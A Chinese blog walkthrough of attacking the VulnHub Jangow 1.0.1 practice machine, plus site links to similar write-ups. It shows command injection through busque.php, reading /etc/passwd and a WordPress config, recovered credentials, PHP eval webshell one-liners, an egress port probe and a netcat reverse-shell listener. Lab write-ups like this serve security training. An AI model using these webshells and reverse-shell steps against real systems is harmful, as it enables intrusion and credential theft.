jangow靶机渗透

最新推荐文章于 2024-01-29 12:13:05 发布
最新推荐文章于 2024-01-29 12:13:05 发布
阅读量1k 收藏 19
点赞数 23
文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/leoNULLdo/article/details/134800893
版权

1.环境准备

靶场地址:Jangow: 1.0.1 ~ VulnHub 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 攻击机:kali(192.168.239.128) 靶机:JANGOW(192.168.239.130) 目标:提升为root权限获取root目录下的flag

2.信息收集

arp-scan -l确认目标ip

扫描开放的端口,21和80端口开放

 

找到一个超链接

尝试点击不同页面,点击其他链接Buscar

跳转到http://192.168.239.130/site/busque.php?buscar=

发现/site/busque.php?buscar=,尝试http://192.168.239.130/site/busque.php?buscar=ls

执行命令/site/busque.php?buscar=whoami查看当前用户

cat /etc/passwd,本机用户:有一个普通用户jangow01和root有shell权限

netstat -napt,发现靶机监听3306,22,80,21端口

手动扫描开放的端口,只扫描到80和21,说明靶机可能对3306和22做了过滤

使用dirb扫描网站目录,发现wordpress,#dirb http://192.168.239.130

查看wordpress下文件,找到config.php

改后缀后查看文件http://192.168.239.130/site/busque.php?buscar=cp%20wordpress/config.php%20wordpress/config.txt

使用得到的用户名尝试登陆,failed

向网站根目录写入webshell/site/busque.php?buscar=echo '<?php @eval($_POST['glc']); ?>' >> glc.php

查看是否成功,http://192.168.239.130/site/busque.php?buscar=ls

连接shell

产看文件,发现html目录下有个隐藏文件.backup

查看jangow01的home目录,找到user.txt,

get user.txt下载到本地,md5解密发现为空

目前已经获得的信息:

(1)监听了3306、21、80、22端口,但是只端口探测只扫到80、21,可能有防火墙

(2)用户名:jangow01 密码:abygurl69,可登录ftp,ftp的版本信息为vsftpd3.0.3,在jangow01的家目录中找到了一个空flag,但是ftp的权限不允许上传文件

(3)用户名:desafio02 密码:abygurl69,ftp、mysql均连接不成功

(4)网站存在一个命令执行漏洞: http://192.168.239.130/site/busque.php?buscar=ls

3.信息利用

使用命令执行漏洞写入

192.168.239.130/site/busque.php?buscar=echo '<?php @eval($_POST["cmd"]) ?>' > a.php

探测一下从靶机到外部哪些端口是开放的。原理:在KALI上配置一条iptables规则,将到1-65535端口的流量全部重定向到4444端口,在KALI上监听4444端口,然后再从靶机上发起到1-65535的访问,如果到某个端口的流量未被拦截,那么到该端口的流量将成功转发到4444端口。

antsword文件管理中新建文件,并写入如下的内容

在蚁剑的虚拟终端中执行脚本:./b.sh,不行

新建shell.php文件

攻击机开启443端口监听

nc -lvvp 443

用浏览器去访问shell.php文件,成功反弹shell

DEX000
关注
  • 23
    点赞
  • 19
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
jangow-01-1.0.1
qq_46140711的博客
09-22 1161
jangow-01-1.0.1靶机练习
jangow靶机攻击流程
03-24
在这个“jangow靶机攻击流程”中,我们学习了如何逐步渗透一个靶机系统,从信息收集、漏洞利用到权限提升的过程。以下是每个步骤的详细解释: 步骤一:首先,设置靶机网络为桥接模式,并获取其IP地址。这是攻击前的...
Jangow
果粒程
05-15 662
尝试常规的反弹shell,发现都不可以,可能是nc 不支持 -e 参数,这个时候可以使用 mkfifo 命令创建命名管道反弹shell;使用蚁剑在/var/www/html/site/下面新建shell.php文件,内容在下面。使用之前翻到的两个账号密码分别尝试,结果.backup 文件中的可以登陆,翻看下没有什么有用的信息。用浏览器去访问shell.php文件,成功反弹shell。上传exp文件到靶机,增加执行权限,然后执行。我使用的是45010.c,将文件下载到本地。确认开放了21、80端口。
VulnHub | Jangow 1.0.1
薛定的餓貓
12-05 3152
VulnHub | Jangow 1.0.1 项目地址 http://www.vulnhub.com/entry/jangow-101,754/ 难度:Easy 测试环境 攻击机:Parrot 192.168.56.104 目标靶机:Ubuntu 192.168.56.118 信息收集 开启目标靶机,登陆界面有其IP地址,不用自己手动扫描。但是还是要用nmap扫一下开启了什么端口。sudo nmap -sS -n -p- 192.168.56.118,然后使用-sV参数查看开放端口的详细信息。 打开网页
vulnhub 靶机 Jangow: 1.0.1
qq_44029310的博客
06-11 2898
一次打靶记录。
jangow靶机实验实战演练
lianliandad的博客
11-02 849
Ubuntu 16.04版本存在本地提权漏洞,该漏洞存在于Linux内核带有的eBPF bpf(2)系统调用中,当用户提供恶意BPF程序使eBPF验证器模块产生计算错误,导致任意内存读写问题,攻击者通过普通用户权限可以利用该漏洞进行提升至高权限用户,获取root权限。
【Vulnhub靶场】JANGOW: 1.0.1
Nailaoyyds的博客
06-02 668
开局是给IP的 二、web渗透 但是只能查看文件,并不能登录。需要进行下一步操作 翻找敏感文件
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机JANGOW_ 1.0.1
LainWith的博客
10-06 1117
Jangow(此系列共1台)发布日期:2021年11月4日难度:低提示信息:爆破是拿下靶机的重要手段目标:取得 root 权限 + Flag主机发现端口扫描路径枚举命令执行反弹shellftp利用内核提权靶机练习-JANGOW: 1.0.1。
jangow-01-1.0.1靶机复盘
weixin_44681307的博客
07-09 122
为什么要说防火墙,后来才发现这个靶机设置了防火墙,只有允许的端口允许的命令才可以用,其他的都不能用,包括端口也只有443端口被允许通过。因为nc -e不能用,所以就在网上找了个反弹shell的命令,这里要注意的是只有443端口能用,别的端口都不能用。在网址后面随便输入ls命令,发现可以用,经过尝试发现这里可以注入代码,但是有一些命令被禁用了,比如nc。搜了一圈发现有两个php文件挺可疑,就发送到自己电脑上了,实际后面没啥用,ftp也没啥用。测试后发现是可以的,代码不见了,说明被执行了。
Vulnhub靶机jangow-01-1.0.1
qq_48904485的博客
01-03 512
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机jangow01(10.0.2.4)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/jangow-101,754/
每周打靶练习之JANGOW:1.0.1
最新发布
chhsbsjs的博客
01-29 468
之后在原来的页面下随便点击功能点发现Buscar点进去就是刚刚扫描出来的空白页但是后面多了个参数,试试命令执行。发现该目录下还有一个wordpress目录,进去发现一个config配置文件,有数据库账号密码。然后试了各种方法都没有反弹回来,后来发现靶机只能通过443端口通信所以我们对命令进行一个修改。我们选择一个下载后上传上去,先上传到网站目录下我们在移到家目录下然后赋予权限。
vulnhub——jangow-01-1.0.1靶机
Re1_zf的博客
10-28 1094
我这里/出不来,所以采用的方式就是先cd到根目录,再cd到interfaces文件的目录,在当前目录使用vi修改文件内容。修改完成后按F10或ctrl+x启动(如果没有进入下面的界面,按F10或ctrl+x的时候同步按回车)修改网卡为自己的网卡(这里的自己的网卡不是本机的网卡,而是上面ifconfig -a出来的靶机的网卡)但是在蚁剑的虚拟终端执行后是没有反应的,必须使用反弹的交互式shell。但是加权限执行后没用,看了一下发现大小为0,传输的有问题应该。这里可以简单操作,但是使用这个虚拟终端无法提权。
【靶场实战】Vulnhub - JANGOW: 1.0.1 靶标实战
做自己喜欢的事,并将其发挥到极致!
05-30 1064
Vulnhub - JANGOW: 1.0.1 靶标实战
VulnHub_Jangow: 1.0.1
qq_45434762的博客
04-16 612
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关主机信息kali:192.168.31.9 BreakOut:192.168.31.227信息收集使用nmap探测目标主机端口2个端口,一个FTP,一个http80端口网站打开...
hackbox靶机渗透
10-15
好的,关于hackbox靶机渗透,我可以提供一些基本的信息和建议。首先,hackbox是一个虚拟机靶机,可以用于练习渗透测试技能。在渗透测试过程中,需要进行信息收集、漏洞扫描、漏洞利用等步骤。以下是一些可能有用的工具和技术: 1. Nmap:用于端口扫描和服务识别。 2. Metasploit:用于漏洞利用和后渗透。 3. Hydra:用于暴力破解密码。 4. Burp Suite:用于Web应用程序渗透测试。 5. SQL注入、XSS等常见漏洞的利用方法。 当然,这只是一些基本的工具和技术,实际的渗透测试需要根据具体情况进行选择和使用。此外,还需要注意法律和道德问题,不要进行未经授权的渗透测试。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值